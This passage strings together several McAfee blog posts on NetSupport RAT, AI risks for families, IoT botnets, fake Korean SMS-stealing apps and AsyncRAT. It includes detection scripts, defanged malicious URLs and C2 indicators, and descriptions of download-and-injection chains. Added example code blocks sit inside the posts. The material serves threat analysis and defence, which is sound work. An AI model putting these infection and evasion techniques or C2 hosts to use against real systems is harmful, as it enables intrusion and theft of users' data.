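     "cmdline": "powershell.exe -File C:\\Scripts\\inventory.ps1"},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# -ExecutionPolicy Bypass, or the -ep abbreviation PowerShell also accepts.
BYPASS_RE = re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
APPDATA_CLIENT32_RE = re.compile(r"\\AppData\\(?:Roaming|Local)\\.*\\client32\.exe$", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the rule names the event trips (empty list if none)."""
    hits = []
    if event["type"] == "process":
        image = basename(event["image"])
        parent = basename(event["parent"])
        cmd = event["cmdline"]
        if image == "powershell.exe" and parent in SCRIPT_HOSTS:
            hits.append("script_host_spawns_powershell")
        if image == "powershell.exe" and BYPASS_RE.search(cmd):
            hits.append("powershell_executionpolicy_bypass")
        if image == "bitsadmin.exe" and "/transfer" in cmd.lower() and parent == "powershell.exe":
            hits.append("bitsadmin_download_from_powershell")
        if APPDATA_CLIENT32_RE.search(event["image"]):
            hits.append("client32_executed_from_appdata")
    elif event["type"] == "registry":
        if RUN_KEY_RE.search(event["key"]) and APPDATA_CLIENT32_RE.search(event["value"]):
            hits.append("run_key_persistence_client32")
    return hits


def scan(events):
    """Map event index -> list of rule hits, omitting events that trip nothing."""
    results = {}
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            results[i] = hits
    return results


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}")
```

Any one rule on its own is noisy in a large estate; the value is in seeing several of them fire for the same user session within minutes, which is the shape of the chain the figures show.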
This malware is known for its persistence and attempts to hide within the user’s profile directories, which makes it challenging to remove.
In the first variant, it creates a “MsEdgeSandbox” folder in AppData and downloads the following files into that folder.
Figure 17: Created Directory
Various installation paths were seen across variants, mostly randomly named folders under the user’s AppData\Roaming directory.
Figure 18: File Signature
Client32.ini: This file contains the configuration settings for NetSupport Manager. It governs how NetSupport Manager interacts with managed hosts and allows operators to configure various options.
NSM.LIC: The LIC file contains license details related to the NetSupport Manager installation, which are essential for proper licensing and software activation.
Figure 19: INI File
C2: jokosampbulid1.com:1412 (domain jokosampbulid1.com, port 1412)
Figure 20: C2 Communication
Figure 21: HTTP Stream
The analysis of NetSupport malware variants has revealed a persistent and continually evolving threat. These variants employ intricate infection chains and technical tricks to accomplish their malicious goals. Our investigation has provided insights into their modus operandi, including downloading and executing files through obfuscated JavaScript code and altering the Windows Registry for persistence.
At McAfee Labs, our commitment is unwavering. We strive to provide robust and effective threat defense mechanisms to safeguard our users from a wide array of threats, including NetSupport and its various iterations. Our security software harnesses the power of signature-based, machine learning, threat intelligence, and behavior-based detection techniques, all working together to identify and thwart threats effectively. In an ever-changing digital landscape, our focus remains on keeping you safe and secure from emerging threats.
Type | Indicator
--- | ---
JS | 5ffb5e9942492f15460e58660dd121b31d4065a133a6f8461554ea8af5c407aa
EXE | 89F0C8F170FE9EA28B1056517160E92E2D7D4E8AA81F4ED696932230413A6CE1
URL | hxxp://45[.]15[.]158[.]212/fakeurl.htm

Type | Indicator
--- | ---
JS | 48bc766326068e078cf258dea70d49dcce265e4e6dbf18f1a0ce28d310f6a89a
JS | 73e0975c94ebcdec46fd23664ccecf8953dd70eea1f4e5813e7f8cd8d2dbc4f9
URL | hxxps://svirtual[.]sanviatorperu[.]edu[.]pe/readme.txt
The post Beneath the Surface: How Hackers Turn NetSupport Against Users appeared first on McAfee Blog.
When we come across the term Artificial Intelligence (AI), our mind often ventures into the realm of sci-fi movies like I, Robot, Matrix, and Ex Machina. We’ve always perceived AI as a futuristic concept, something that’s happening in a galaxy far, far away. However, AI is not only here in our present but has also been a part of our lives for several years in the form of various technological devices and applications.
In our day-to-day lives, we use AI in many instances without even realizing it. AI has permeated into our homes, our workplaces, and is at our fingertips through our smartphones. From cell phones with built-in smart assistants to home assistants that carry out voice commands, from social networks that determine what content we see to music apps that curate playlists based on our preferences, AI has its footprints everywhere. Therefore, it’s integral to not only embrace the wows of this impressive technology but also understand and discuss the potential risks associated with it.
→ Dig Deeper: Artificial Imposters—Cybercriminals Turn to AI Voice Cloning for a New Breed of Scam
AI, a term that might sound intimidating to many, is not so when we understand it. It is essentially technology that can be programmed to achieve certain goals without assistance. In simple words, it’s a computer’s ability to predict, process data, evaluate it, and take necessary action. This smart way of performing tasks is being implemented in education, business, manufacturing, retail, transportation, and almost every other industry and cultural sector you can think of.
AI has been doing a lot of good too. For instance, Instagram, the second most popular social network, is now deploying AI technology to detect and combat cyberbullying in both comments and photos. No doubt, AI is having a significant impact on everyday life and is poised to metamorphose the future landscape. However, alongside its benefits, AI has brought forward a set of new challenges and risks. From self-driving cars malfunctioning to potential jobs lost to AI robots, from fake videos and images to privacy breaches, the concerns are real and need timely discussions and preventive measures.
AI has made it easier for people to face-swap within images and videos, leading to “deep fake” videos that appear remarkably realistic and often go viral. A desktop application called FakeApp allows users to seamlessly swap faces and share fake videos and images. While this displays the power of AI technology, it also brings to light the responsibility and critical thinking required when consuming and sharing online content.
→ Dig Deeper: The Future of Technology: AI, Deepfake, & Connected Devices
Yet another concern raised by AI is privacy breaches. The Cambridge Analytica/Facebook scandal of 2018, alleged to have used AI technology unethically to collect Facebook user data, serves as a reminder that our private (and public) information can be exploited for financial or political gain. Thus, it becomes crucial to discuss and take necessary steps like locking down privacy settings on social networks and being mindful of the information shared in the public feed, including reactions and comments on other content.
McAfee Pro Tip: Cybercriminals employ advanced methods to deceive individuals, propagating sensationalized fake news, creating deceptive catfish dating profiles, and orchestrating harmful impersonations. Recognizing sophisticated AI-generated content can pose a challenge, but certain indicators may signal that you’re encountering a dubious image or interacting with a perpetrator operating behind an AI-generated profile. Know the indicators.
With the advent of AI, cybercrime has found a new ally. As per McAfee’s Threats Prediction Report, AI technology might enable hackers to bypass security measures on networks undetected. This can lead to data breaches, malware attacks, ransomware, and other criminal activities. Moreover, AI-generated phishing emails are scamming people into unknowingly handing over sensitive data.
→ Dig Deeper: How to Keep Your Data Safe From the Latest Phishing Scam
Bogus emails are becoming highly personalized and can trick intelligent users into clicking malicious links. Given the sophistication of these AI-related scams, it is vital to constantly remind ourselves and our families to be cautious with every click, even those from known sources. The need to be alert and informed cannot be overstressed, especially in times when AI and cybercrime often seem to be two sides of the same coin.
As homes evolve to be smarter and synced with AI-powered Internet of Things (IoT) products, potential threats have proliferated. These threats are not limited to computers and smartphones but extend to AI-enabled devices such as voice-activated assistants. According to McAfee’s Threat Prediction Report, these IoT devices are particularly susceptible as points of entry for cybercriminals. Other devices at risk, as highlighted by security experts, include routers, and tablets.
This means we need to secure all our connected devices and home internet at its source – the network. Routers provided by your ISP (Internet Service Provider) are often less secure, so consider purchasing your own. As a primary step, ensure that all your devices are updated regularly. More importantly, change the default password on these devices and secure your primary network along with your guest network with strong passwords.
Having an open dialogue about AI and its implications is key to navigating the intricacies of this technology. Parents need to have open discussions with kids about the positives and negatives of AI technology. When discussing fake videos and images, emphasize the importance of critical thinking before sharing any content online. You could even introduce them to the desktop application FakeApp, which lets users swap faces within images and videos seamlessly, producing deep fake photos and videos that can appear remarkably realistic and often go viral.
Privacy is another critical area for discussion. After the Cambridge Analytica/Facebook scandal of 2018, the conversation about privacy breaches has become more significant. These incidents remind us how our private (and public) information can be misused for financial or political gain. Locking down privacy settings, being mindful of the information shared, and understanding the implications of reactions and comments are all topics worth discussing.
Awareness and knowledge are the best tools against AI-enabled cybercrime. Making families understand that bogus emails can now be highly personalized and can trick even the most tech-savvy users into clicking malicious links is essential. AI can generate phishing emails, scamming people into handing over sensitive data. In this context, constant reminders to be cautious with every click, even those from known sources, are necessary.
→ Dig Deeper: Malicious Websites – The Web is a Dangerous Place
The advent of AI has also likely allowed hackers to bypass security measures on networks undetected, leading to data breaches, malware attacks, and ransomware. Therefore, being alert and informed is more than just a precaution – it is a vital safety measure in the digital age.
Artificial Intelligence has indeed woven itself into our everyday lives, making things more convenient, efficient, and connected. However, with these advancements come potential risks and challenges. From privacy breaches, and fake content, to AI-enabled cybercrime, the concerns are real and need our full attention. By understanding AI better, having open discussions, and taking appropriate security measures, we can leverage this technology’s immense potential without falling prey to its risks. In our AI-driven world, being informed, aware, and proactive is the key to staying safe and secure.
To safeguard and fortify your online identity, we strongly recommend that you delve into the extensive array of protective features offered by McAfee+. This comprehensive cybersecurity solution is designed to provide you with a robust defense against a wide spectrum of digital threats, ranging from malware and phishing attacks to data breaches and identity theft.
The post AI & Your Family: The Wows and Potential Risks appeared first on McAfee Blog.
Recent Internet attacks have caused several popular sites to become unreachable, including Twitter, Etsy, Spotify, Airbnb, GitHub, and The New York Times. These incidents have highlighted a new threat to online services: botnets powered by the Internet of Things (IoT). Distributed denial of service (DDoS) attacks have been around for over a decade and, for the most part, have been handled by network providers’ security services. However, the landscape is changing.
The primary strategy in these attacks is to control a number of devices which then simultaneously flood a destination with network requests. The target becomes overloaded and legitimate requests cannot be processed. Traditional network filters typically handle this by recognizing and blocking systems exhibiting this malicious behavior. However, when thousands of systems mount an attack, these traditional filters fail to differentiate between legitimate and malicious traffic, causing system availability to crumble.
Cybercriminals and hacktivists have found a new weapon in this war: the IoT. Billions of IoT devices exist, ranging in size from a piece of jewelry to a tractor. These devices all have one thing in common: they connect to the internet. While this connection offers tremendous benefits, such as allowing users to monitor their homes or check the contents of their refrigerators remotely, it also presents a significant risk. For hackers, each IoT device represents a potential recruit for their bot armies.
A recent attack against a major DNS provider shed light on this vulnerability. Botnets containing tens or hundreds of thousands of hijacked IoT devices have the potential to bring down significant sections of the internet. Over the coming months, we’ll likely discover just how formidable a threat these devices pose. For now, let’s dig into the key aspects of recent IoT DDoS attacks.
The proliferation of Internet of Things (IoT) devices has ushered in a new era of digital convenience, but it has also opened the floodgates to a range of cybersecurity concerns. To navigate the complexities of this digital landscape, it’s essential to grasp five key points:
Each device that can be hacked is a potential soldier for a botnet army, which could be used to disrupt essential parts of the internet. Such attacks can interfere with your favorite sites for streaming, socializing, shopping, healthcare, education, banking, and more. They have the potential to undermine the very foundations of our digital society. This underscores the need for proactive measures to protect our digital way of life and ensure the continued availability of essential services that have become integral to modern living.
→ Dig Deeper: How Valuable Is Your Health Care Data?
Hackers will fight to retain control over these devices. Though the malware used in the Mirai botnets is simple, it will evolve as quickly as necessary for attackers to keep that control. IoT devices are valuable to attackers because they enable devastating DDoS attacks with minimal effort. As we embrace the convenience of IoT, we must also take on the responsibility of securing these devices to maintain the integrity and resilience of our increasingly digitized way of life.
Identifying and mitigating attacks from a handful of systems is manageable. However, when tens or hundreds of thousands of devices are involved, it becomes nearly impossible. The resources required to defend against such an attack are immense and expensive. For instance, a recent attack that aimed to incapacitate Brian Krebs’ security-reporting site led to Akamai’s Vice President of Web Security stating that if such attacks were sustained, they could easily cost millions in cybersecurity services to keep the site available. Attackers are unlikely to give up these always-connected devices that are ideal for forming powerful DDoS botnets.
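The point made above, that a per-source filter copes with a handful of loud attackers but not with thousands of quiet ones, is easy to see in simulation. The following is an added example and not code from the original post: it builds two synthetic floods of comparable size (the 10.0.0.0/8 addresses, the 100 requests-per-second block threshold and the 10,000 requests-per-second target capacity are all made-up values for the illustration) and runs both through a classic per-source rate filter.

```python
from collections import Counter


def make_flows(n_sources: int, per_source_rps: int, seconds: int = 1):
    """Constructed traffic: (second, source_ip) tuples for a synthetic flood.

    n_sources hosts each send per_source_rps requests every second. The
    10.0.0.0/8 addresses are made up for this example.
    """
    flows = []
    for t in range(seconds):
        for i in range(n_sources):
            src = f"10.{(i >> 16) & 255}.{(i >> 8) & 255}.{i & 255}"
            flows.extend((t, src) for _ in range(per_source_rps))
    return flows


def per_source_blocklist(flows, threshold_rps: int):
    """Traditional filter: block any source exceeding threshold_rps within one second."""
    rate = Counter()
    for t, src in flows:
        rate[(t, src)] += 1
    return {src for (_, src), n in rate.items() if n > threshold_rps}


def residual_load(flows, blocked, seconds: int = 1):
    """Average requests per second that still reach the target after filtering."""
    return sum(1 for _, src in flows if src not in blocked) / seconds


def capacity_exceeded(flows, threshold_rps: int, capacity_rps: int, seconds: int = 1):
    """Return (target_overloaded, sources_blocked) for a flood run through the filter."""
    blocked = per_source_blocklist(flows, threshold_rps)
    return residual_load(flows, blocked, seconds) > capacity_rps, len(blocked)


if __name__ == "__main__":
    # Same filter threshold and target capacity, two attacks of comparable size.
    few_loud = make_flows(5, 5000)      # 25,000 rps from five hosts
    many_quiet = make_flows(2000, 20)   # 40,000 rps from two thousand hosts
    for name, flows in (("few loud sources", few_loud), ("many quiet sources", many_quiet)):
        overloaded, blocked = capacity_exceeded(flows, threshold_rps=100, capacity_rps=10_000)
        print(f"{name}: blocked {blocked} sources, target overloaded = {overloaded}")
```

The first flood is stopped completely because every source trips the threshold; the second passes untouched, since no single device sends enough to look abnormal, yet the aggregate still exceeds what the target can serve. Lowering the threshold until it catches 20 requests per second would start blocking ordinary users, which is the dilemma the text describes.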
There’s been speculation that nation-states are behind some of these attacks, but this is highly unlikely. The authors of Mirai, a prominent botnet, willingly released their code to the public, something a governmental organization would almost certainly not do. However, it’s plausible that after observing the power of IoT botnets, nation-states are developing similar strategies—ones with even more advanced capabilities. In the short term, however, cybercriminals and hacktivists will continue to be the primary drivers of these attacks.
→ Dig Deeper: Mirai Botnet Creates Army of IoT Orcs
In the coming months, expect criminals to find ways to profit from these attacks, such as through extortion. In the immediate future, cybercriminals and hacktivists will remain the main culprits, exploiting insecure IoT devices to mount devastating DDoS attacks and constantly evolving their methods to stay ahead of defenses.
→ Dig Deeper: Hacktivists Turn to Phishing to Fund Their Causes
Unfortunately, the majority of IoT devices lack robust security defenses. The devices currently being targeted are the most vulnerable, many of which have default passwords easily accessible online. Unless the owner changes the default password, hackers can quickly and easily gain control of these devices. With each device they compromise, they gain another soldier for their botnet.
To improve this situation, several factors must be addressed. Devices must be designed with security at the forefront; they must be configured correctly and continuously managed to keep their security up-to-date. This will require both technical advancements and behavioral changes to stay in line with the evolving tactics of hackers.
McAfee Pro Tip: Software updates do more than patch security holes; they also bring new features, better compatibility and stability improvements, and sometimes remove features. Frequent update reminders can be bothersome, but applying them promptly keeps your devices working well and out of a botnet. Read more about the importance of software updates.
Securing IoT devices is now a critical issue for everyone. The sheer number of IoT devices, combined with their vulnerability, provides cybercriminals and hacktivists with a vast pool of resources to fuel potent DDoS campaigns. We are just beginning to observe the attacks and issues surrounding IoT security. Until the implementation of comprehensive controls and responsible behaviors becomes commonplace, we will continue to face these challenges. By understanding these issues, we take the first steps toward a more secure future.
Take more steps with McAfee to secure your digital future. Explore our security solutions or read our cybersecurity blogs and reports.
The post Top 5 Things to Know About Recent IoT Attacks appeared first on McAfee Blog.
Authored by Dexter Shin
Most people have smartphones these days which can be used to easily search for various topics of interest on the Internet. These topics could be about enhancing their privacy, staying fit with activities like Pilates or yoga, or even finding new people to talk to. So, companies create mobile applications to make it more convenient for users and advertise these apps on their websites. But is it safe to download these advertised applications through website searches?
McAfee Mobile Research Team recently observed a malicious Android and iOS information stealer application delivered via phishing sites. This malware became active in early October and has been observed installed on more than 200 devices, according to McAfee’s telemetry. All of these devices are located in South Korea. Considering that all the distribution phishing sites are active at the time of writing this blog post, it is expected that the number of affected devices will continue to increase.
The malware author picks a service people find appealing and lures victims by disguising the malicious app as that service. They also build phishing sites that reuse the resources of the legitimate sites, so the pages look identical and users believe they are on the official website of the app they want to install. Each phishing site offers both Android and iOS versions of the malicious application. When users download and run the app from the phishing site, their contact information and SMS messages are sent to the malware author. McAfee Mobile Security detects this threat as Android/SpyAgent. For more information, visit McAfee Mobile Security.
How to distribute
We recently wrote about SpyNote, which was delivered through a phishing campaign targeting Japan. After finding this malware and confirming that it targets South Korea, we suspected it was also distributed through phishing, so we searched several Korean online communities. In one of them, Arca Live, we were able to confirm the exact distribution method.
The scammers first approach victims via SMS, posing as women and sending seductive messages with photos. After some conversation they move the chat to LINE messenger, where they become more aggressive: they send the victim a link to start a video call and insist that it can only be done through an app that prevents screen capture. That link leads to a phishing site that serves the malicious apps.
Figure 1. Distribute phishing sites from LINE messenger after moving from SMS (Red text: Scammer, Blue text: Victim)
What do phishing sites do
One of the phishing sites disguises as Camtalk, a legitimate social networking app available on the Google Play Store and Apple App Store, to trick users into downloading malicious Android and iOS applications from remote servers. It uses the same text, layout, and buttons as the legitimate Camtalk website, but instead of redirecting users to the official app store, it forces them to download the malicious application directly:
Figure 2. Comparison of legitimate site (Left) and phishing site (Right)
Besides the social networking disguise, the malware authors behind this campaign use other themes for their phishing sites. The app in the first picture below offers cloud-based photo storage with more functions than the default album app, such as password-protecting chosen albums. The apps in the second and third pictures are yoga and fitness apps, topics that users can easily search for nearby. The important point is that apps of these kinds normally have no reason to request permission to access SMS messages and contacts.
Figure 3. Many phishing sites in various fields
All phishing sites we found are hosted on the same IP address and they encourage users to download the app by clicking on the Google Play icon or the App Store icon.
Figure 4. Flow for downloading malicious app files
When users click the store button for their devices, their devices begin downloading the type of file (Android APK or iOS IPA) appropriate for each device from a remote server rather than the official app store. And then devices ask users to install it.
Figure 5. The process of app installation on Android
Figure 6. The process of app installation on iOS
How to sign iOS malware
iOS has more restrictive sideloading policies than Android. If an app is not signed with a certificate from a developer the device already trusts, the user must manually trust that developer before the app will launch. This applies whenever apps are installed from sources other than the official App Store, so additional steps are required before such an app can run.
Figure 7. Need to verify developer certificate on iOS
However, this iOS malware sidesteps that step. Some iPhone users install apps through third-party stores rather than the Apple App Store. Many such stores and tools exist; one of them is called Scarlet. The store shares enterprise certificates, making it easy for developers or crackers who use the store to distribute their apps to its users. Because users already set the certificate to ‘Trust’ when installing Scarlet itself, any other app signed with the same certificate and installed afterward is verified automatically.
Figure 8. App automatically verified after installation of 3rd party store
Their enterprise certificates can be easily downloaded by general users as well.
Figure 9. Enterprise certificate shared via messenger
The iOS malware is using these certificates. So, for devices that already have the certificate trusted using Scarlet, no additional steps are required to execute this malware. Once installed, the app can be run at any time.
Figure 10. Automatic verification and executable app
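The trust inheritance described above can be checked from the provisioning profile embedded in an IPA. The following is an added example, not code from the original post or from the malware authors: it carves the XML property list out of a profile blob (a real embedded.mobileprovision is a CMS signed envelope around that plist; the filler bytes, team identifier, bundle identifier and UDID here are all constructed) and classifies the profile by distribution type. An enterprise (in-house) profile carries ProvisionsAllDevices, which is what lets a second app from the same team run once the first has been trusted.

```python
import plistlib
from datetime import datetime


def build_profile(team_id: str, kind: str, bundle_id: str = "com.example.camtalk") -> bytes:
    """Constructed stand-in for embedded.mobileprovision (not a real Apple profile).

    A real profile is a CMS (PKCS#7) signed blob whose content is an XML plist;
    here opaque filler bytes play the role of the signature envelope.
    kind is one of "enterprise", "adhoc" or "appstore".
    """
    plist = {
        "AppIDName": "Camtalk",
        "TeamIdentifier": [team_id],
        "TeamName": "Example Corp",
        "ExpirationDate": datetime(2030, 1, 1, 0, 0, 0),
        "Entitlements": {"application-identifier": f"{team_id}.{bundle_id}", "get-task-allow": False},
    }
    if kind == "enterprise":
        plist["ProvisionsAllDevices"] = True                           # in-house distribution
    elif kind == "adhoc":
        plist["ProvisionedDevices"] = ["00008030-000A1B2C3D4E5F60"]   # made-up UDID
    return b"\x30\x82\x0b\x00" + b"\x00" * 32 + plistlib.dumps(plist) + b"\xff" * 16


def carve_plist(blob: bytes) -> dict:
    """Pull the XML plist out of a signed profile without verifying the CMS envelope."""
    start = blob.find(b"<?xml")
    end = blob.find(b"</plist>", max(start, 0))
    if start < 0 or end < 0:
        raise ValueError("no XML property list found in profile")
    return plistlib.loads(blob[start:end + len(b"</plist>")])


def classify_profile(blob: bytes) -> dict:
    """Summarise how, and by whom, an app signed with this profile can be installed."""
    p = carve_plist(blob)
    if p.get("ProvisionsAllDevices"):
        kind = "enterprise"        # any device that trusts this team will run it
    elif p.get("ProvisionedDevices"):
        kind = "adhoc"             # only the listed UDIDs
    else:
        kind = "appstore"
    return {
        "kind": kind,
        "team": p["TeamIdentifier"][0],
        "app_id": p["Entitlements"]["application-identifier"],
        "expires": p["ExpirationDate"].date().isoformat(),
    }


def inherits_trust(already_trusted: bytes, new_app: bytes) -> bool:
    """True when new_app runs without a fresh trust prompt because the user already
    trusted an enterprise app from the same team (the Scarlet case described above)."""
    a, b = classify_profile(already_trusted), classify_profile(new_app)
    return a["kind"] == b["kind"] == "enterprise" and a["team"] == b["team"]
```

An IPA is a ZIP archive; the profile sits at Payload/<App>.app/embedded.mobileprovision. On the device, the teams a user has trusted are listed under Settings > General > VPN & Device Management, which is where an unexpected enterprise developer entry would show up after installing a store like Scarlet.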
What do they want
These apps all share the same code; only the application name and icon differ. On Android, they request permission to read your contacts and SMS messages.
Figure 11. Malicious app required sensitive permissions (Android)
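The mismatch between an app's theme and its permissions is something a reviewer can check mechanically from the manifest. The following is an added example, not code from the original post: it parses AndroidManifest.xml text, intersects the declared permissions with a set of data-exposing ones, and subtracts what the claimed app category could plausibly justify. The two manifests and the category table are constructed for this illustration, not recovered from the samples above.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = f"{{{ANDROID_NS}}}name"

# Permissions that hand over message, contact or identity data. The apps in this
# post request READ_SMS and READ_CONTACTS; the rest round out the check.
SENSITIVE = {
    "android.permission.READ_SMS",
    "android.permission.RECEIVE_SMS",
    "android.permission.READ_CONTACTS",
    "android.permission.READ_CALL_LOG",
    "android.permission.READ_PHONE_STATE",
    "android.permission.READ_PHONE_NUMBERS",
}

# Hypothetical expectation table: sensitive permissions an app of this kind
# could plausibly justify. The categories are assumptions for this example.
EXPECTED = {
    "fitness": set(),
    "photo_album": set(),
    "messenger": {"android.permission.READ_CONTACTS"},
}

# Constructed manifests (not recovered from the samples in this post).
YOGA_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.yoga">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <application android:label="Yoga"/>
</manifest>"""

BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.pilates">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <application android:label="Pilates"/>
</manifest>"""


def declared_permissions(manifest_xml: str) -> set:
    """All android:name values of <uses-permission> elements in the manifest."""
    root = ET.fromstring(manifest_xml)
    return {el.get(NAME_ATTR) for el in root.iter("uses-permission") if el.get(NAME_ATTR)}


def unexpected_permissions(manifest_xml: str, category: str) -> set:
    """Sensitive permissions the manifest declares that the app category cannot justify."""
    return (declared_permissions(manifest_xml) & SENSITIVE) - EXPECTED[category]
```

To obtain the manifest text from a real APK, `aapt dump permissions app.apk` or `apkanalyzer manifest print app.apk` from the Android SDK will print it; a yoga app that comes back with READ_SMS and READ_CONTACTS, as in the constructed case above, is exactly the signal the text says users should notice.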
In getDeviceInfo() function, android_id and the victim device’s phone number are sent to the C2 server for the purpose of identifying each device. Subsequently, in the following function, all user’s contact information and SMS messages are sent to the C2 server.
Figure 12. Sensitive data stolen by malware (Android)
On iOS, the app only requests permission to read your contacts, and it asks the user to enter their phone number to join the chat room. This, of course, is how the C2 server identifies the victim.
Figure 13. Malicious app required sensitive permissions (iOS)
Similarly to Android, there is code within iOS that collects contact information and the data is sent to the C2 server.
Figure 14. Sensitive data stolen by malware (iOS)
Conclusion
This ongoing campaign targets South Korea, and 10 phishing sites have been discovered so far. Because it steals the victim’s phone number, contacts, and SMS messages, the stolen data could be reused for other malicious purposes. Users should consider every threat that follows from this: the data the malware author is after is clear, and the parts of the campaign known so far can change.
Users should remain cautious, even if they believe they are on an official website. If an app is not installed through the Google Play Store or Apple App Store, suspicion is warranted. Users should also always question an app that requests permissions unrelated to its intended purpose. Because it is difficult for users to deal with all of these threats on their own, we strongly recommend installing security software on their devices and keeping it up to date. By using McAfee Mobile Security products, users can further safeguard their devices and mitigate the risks linked with these kinds of malware, providing a safer and more secure experience.
Indicators of Compromise (IOCs)
| Indicators | Indicator Type | Description |
| --- | --- | --- |
| hxxps://jinyoga[.]shop/ | URL | Phishing site |
| hxxps://mysecret-album[.]com/ | URL | Phishing site |
| hxxps://pilatesyoaa[.]com/ | URL | Phishing site |
| hxxps://sweetchat19[.]com/ | URL | Phishing site |
| hxxps://sweetchat23[.]com/ | URL | Phishing site |
| hxxps://telegraming[.]pro/ | URL | Phishing site |
| hxxps://dl.yoga-jin[.]com/ | URL | Phishing site |
| hxxps://aromyoga[.]com/ | URL | Phishing site |
| hxxps://swim-talk[.]com/ | URL | Phishing site |
| hxxps://spykorea[.]shop/ | URL | Phishing site |
| hxxps://api.sweetchat23[.]com/ | URL | C2 server |
| hxxps://somaonvip[.]com/ | URL | C2 server |
| ed0166fad985d252ae9c92377d6a85025e9b49cafdc06d652107e55dd137f3b2 | SHA256 | Android APK |
| 2b62d3c5f552d32265aa4fb87392292474a1c3cd7f7c10fa24fb5d486f9f7665 | SHA256 | Android APK |
| 4bc1b594f4e6702088cbfd035c4331a52ff22b48295a1dd130b0c0a6d41636c9 | SHA256 | Android APK |
| bb614273d75b1709e62ce764d026c287aad1fdb1b5c35d18b45324c32e666e19 | SHA256 | Android APK |
| 97856de8b869999bf7a2d08910721b3508294521bc5766a9dd28d91f479eeb2e | SHA256 | iOS IPA |
| fcad6f5c29913c6ab84b0bc48c98a0b91a199ba29cbfc5becced105bb9acefd6 | SHA256 | iOS IPA |
| 04721303e090160c92625c7f2504115559a124c6deb358f30ae1f43499b6ba3b | SHA256 | iOS Mach-O Binary |
| 5ccd397ee38db0f7013c52f68a4f7d6a279e95bb611c71e3e2bd9b769c5a700c | SHA256 | iOS Mach-O Binary |
The post Fake Android and iOS apps steal SMS and contacts in South Korea appeared first on McAfee Blog.
Authored by Lakshya Mathur & Vignesh Dhatchanamoorthy
AsyncRAT, short for “Asynchronous Remote Access Trojan,” is a sophisticated piece of malware designed to compromise the security of computer systems and steal sensitive information. What sets AsyncRAT apart from other malware strains is its stealthy nature, making it a formidable adversary in the world of cybersecurity.
McAfee Labs has observed a recent AsyncRAT campaign being distributed through a malicious HTML file. This entire infection strategy employs a range of file types, including PowerShell, Windows Script File (WSF), VBScript (VBS), and more, in order to bypass antivirus detection measures.
Figure 1 – AsyncRAT prevalence over the last month
A recipient receives a spam email containing a nefarious web link. When accessed, this link triggers the download of an HTML file. Within this HTML file, an ISO file is embedded, and this ISO image file harbors a WSF (Windows Script File). The WSF file subsequently establishes connections with various URLs and proceeds to execute multiple files in formats such as PowerShell, VBS (VBScript), and BAT. These executed files are employed to carry out a process injection into RegSvcs.exe, a legitimate Microsoft .NET utility. This manipulation of RegSvcs.exe allows the attacker to covertly hide their activities within a trusted system application.
Infection Chain
Figure 2 – Infection Chain
Stage 1: Analysis of HTML & WSF file
The sequence begins with a malicious URL in the email, which downloads an HTML file. An ISO file is embedded inside this HTML file, and JavaScript in the page extracts the ISO image.
Figure 3 – Contents of HTML file
Figure 4 – Extracted ISO file when HTML is run
Within the ISO file is a WSF script labeled as “FXM_20231606_9854298542_098.wsf.” This file incorporates junk strings of data, interspersed with specific “<job>” and “<VBScript>” tags (as indicated in Figure 5 and highlighted in red). These tags are responsible for establishing a connection to the URL “hxxp://45.12.253.107:222/f[.]txt” to fetch a PowerShell file.
Figure 5 – Contents of WSF file
Stage 2: Analysis of PowerShell files
The URL “hxxp://45.12.253.107:222/f[.]txt” retrieves a text file that contains PowerShell code.
Figure 6 – Contents of the First PowerShell file
The initial PowerShell code subsequently establishes a connection to another URL, “hxxp://45.12.253.107:222/j[.]jpg,” and retrieves the second PowerShell file.
Figure 7 – Contents of Second PowerShell file
The PowerShell script drops four files into the ProgramData folder, including two PowerShell files, one VBS file, and one BAT file. The contents of these four files are embedded within this PowerShell script. It then proceeds to create a folder named “xral” in the ProgramData directory, where it writes and extracts these files, as depicted in Figure 8.
Figure 8 – Second PowerShell creating 4 files and writing content in them using [IO.File]::WriteAllText command
Figure 9 – Files extracted in the “ProgramData/xral” folder
Stage 3: Analysis of Files dropped in the ProgramData folder
Following this, the PowerShell script executes “xral.ps1,” which creates a scheduled task to achieve persistence and then launches the “xral.vbs” file.
Figure 10 – Content of VBS file
The VBS script proceeds to execute the “1.bat” file, which, in turn, is responsible for executing the final PowerShell script, “hrlm.ps1.”
In short, after the second PowerShell script the execution proceeds as follows:
xral.ps1 -> xral.vbs -> 1.bat -> hrlm.ps1
These various executions of different file types are strategically employed to circumvent both static and behavior-based antivirus detections.
Stage 4: Analysis of the final PowerShell file
Figure 11 – Content of final PowerShell file
As depicted in the preceding figure, this PowerShell file contains a PE (Portable Executable) file in hexadecimal format. This file is intended for injection into a legitimate process. In the second red-highlighted box, it’s evident that the attackers have obfuscated the process name, which will be revealed after performing a replacement operation. It is now evident that this PE file is intended for injection into “C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe.” The process injection is accomplished through the Reflection Assembly load functionality of the PowerShell file, which allows access and invocation of .NET data from within PowerShell.
After the process injection, the RegSvcs utility is initiated and executed without any additional parameters.
Stage 5: Analysis of infected RegSvcs.exe
Once PowerShell has injected the malicious code into RegSvcs, the compromised RegSvcs.exe runs and connects to the AsyncRAT command-and-control server. The artifacts of the infected RegSvcs.exe are shown in Figure 12.
Figure 12 – AsyncRAT server strings in RegSvcs
Further analysis showed that this sample has keylogging capabilities. It records all keystrokes on the system after infection, storing them in a “log.tmp” file in the TEMP folder.
Figure 13 – Log file created in %temp% folder logging all keystrokes
